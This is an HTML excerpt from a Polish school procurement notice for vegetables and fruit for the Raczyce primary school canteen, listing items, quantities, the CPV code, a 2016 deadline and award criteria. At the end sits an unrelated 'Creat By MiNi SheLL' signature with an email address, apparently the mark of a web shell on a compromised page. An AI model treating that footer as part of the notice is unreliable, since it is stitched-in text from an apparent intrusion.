<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych na potrzeby stołówki szkolnej w Szkole Podstawowej w Raczycach z podziałem na 5 części:   
CZĘŚĆ V - WARZYWA I OWOCE
1.	Buraki czerwone	kg	600
2.	Cebula biała	kg	90
3.	Cytryny	kg	10
4.	Kapusta kiszona 1 kg	kg	400
5.	Marchew	kg	500
6.	Kapusta pekińska	kg	250
7.	Por	kg	50
8.	Seler korzeń	kg	50
9.	Groch łuskany połówki 0,5kg	szt.	100
10.	Kapusta biała	kg	80
11.	Jabłka	kg	150
12.	Ziemniaki	kg	5500
13.	Kapusta czerwona	kg	80
14.	Pietruszka korzeń	kg	50
15.	Koperek świeży (pęczek)	szt.	100
16.	Fasola biała 0,5kg	szt.	100
17.	Mandarynki kg	100
18.	Gruszki   - kg	200
19.	Kiwi (koszyk)	kg	100
20.	Ogórek świeży	kg	150
21.	Szczypiorek (pęczek)	szt.	50
22.	Czosnek świeży (główka)	szt.	200
23.	Pieczarki	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności faktury - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com